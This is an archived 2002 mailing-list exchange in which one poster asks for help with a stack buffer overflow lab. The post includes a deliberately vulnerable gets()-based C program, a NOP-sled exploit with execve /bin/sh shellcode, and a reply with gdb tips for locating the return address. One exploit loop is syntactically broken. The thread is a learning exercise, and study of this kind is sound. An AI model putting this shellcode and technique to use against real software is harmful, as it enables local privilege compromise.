Odds are, at least on my computer, your malicious buffer full of wonderful things (nops, shellcode, etc) are NOT at where esp was at the time of the crash. There may be other things on the stack. So, here's what I'd do. Run your exploit (unsuccessfully of course) and examine the core (gdb <vuln program> <core>). Examine from where esp was, and keep going until you see a bunch of nops. e.g. x/10i $esp should (i haven't use gdb for a while, it's something along those lines) show you all the instructions starting from the address esp holds 10 lines at a time (hit enter to continue). so you might see something like (assuming $esp is 0x1)...: 0x1 jmp mypenis 0x2 xor eax,eax 0x3 sub eax, 9 <7 other instructions> [hit enter] 0x10 add eax, 10 0x11 sub eax, 69 0x12 (bad) 0x13 nop 0x14 nop 0x15 nop 0x16 nop 0x17 nop 0x18 nop 0x19 nop As you can see, your data you put on the stack started at 0x13, and not 0x1 (where esp was). So replace that address as your return address. If it still doesn't work, let me know. - Brandon Erhart At 12:55 PM 7/24/2002 -0700, Jeremy Junginger wrote: >In reading the following link, I decided to play with the examples and >try to figure out a simple buffer overflow. Just to say I've at least >made one do something predictable. At any rate, I have gotten to the >point where I can make the program call the function twice before >dumping. I am a little stuck when it comes to inserting the shellcode. >I'll highlight what I think is the code I'm not understanding >completely. Please take a look if you have time, and even if you don't, >thanks for reading the post: > >http://www.neworder.box.sk/newsread.php?newsid=5333 > >Below is a modified version of the code presented on the above link. I >assume NO CREDIT for this code other than I have changed a couple of >variables. I'm just trying to illustrate a concept rather than create >something original at this point. Keeping this in mind, read on: > >-------------------------------- > >/*This one works:*/ >/*PROGRAM WITH BUFFER OF 255*/ >/*TESTDS.C*/ >void lame() { >char small[255]; >gets(small); >printf("%s\n",small); >} >int main() { >lame(); >} > >----------------------------------- > >/*Running this one and piping the output to testds makes the program run >twice:*/ >/*PROGRAM TO OVERFLOW TESTDS*/ >/*This will hit call lame twice, so the output should be two identical >lines followed by a core dump*/ >/*If it does not core dump, issue the ulimit -c 10000 command*/ >/*TESTDS_EXPLOIT.C*/ >main() >{ >int i=0; char buf[268]; >for(i=0;i<=268;i+=4) >*(long*) &buf[i] = 0x80484ca; >puts(buf); >} > >------------------------------------ > >/*I don't think I have the memory address or something correct. This is >where I need help. Anyone?!?*/ >/*PROGRAM TO RUN SHELLCODE FROM TESTDS*/ >/*1 Fill the buffer with the return address,*/ >/*2 Fill the buffer with NOPS,*/ >/*3 Copy the shellcode at the end of the NOPS,*/ >/*4 set the home variable and */ >/*5 execute TESTDS.*/ >char shellcode[] = >"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0" >"\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd" >"\x80\xe8\xde\xff\xff\xff/bin/sh";; >int main() >{ >char buffer[268]; >long retaddr = 0xbffffa10; /*Return Address, I got this from info reg >esp after overflowing the buffer*/ >int i; >fprintf(stderr,"using address 0x%lx\n",retaddr); >for(i=0;i<268;i+=4) >*(long*)&buffer[i] = retaddr; /*Fills Buffer with Ret Address*/ >for(i=0;i<(268-strlen(shellcode)-100;i++) >*(buffer+i) = 0x90; /*Fills the Buffer with NOPS*/ >memcpy(buffer+i,shellcode,strlen(shellcode)); /*Shellcode is copied at >the end of the NOPS*/ >setenv("HOME",buffer,1); /*Sets HOME VARIABLE*/ >execlp("TESTDS","TESTDS",NULL); /*Execute Program*/ >return 0; >} > > >Thanks for the assistance. >-Jeremy
This archive was generated by hypermail 2b30 : Wed Jul 24 2002 - 23:46:55 PDT